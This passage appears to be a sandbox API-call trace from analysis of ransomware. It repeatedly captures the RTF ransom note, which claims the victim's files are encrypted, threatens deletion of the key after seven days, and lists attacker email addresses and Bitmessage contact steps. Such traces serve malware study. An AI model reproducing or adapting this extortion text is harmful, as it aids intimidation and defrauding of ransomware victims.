:\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.843] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.843] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. 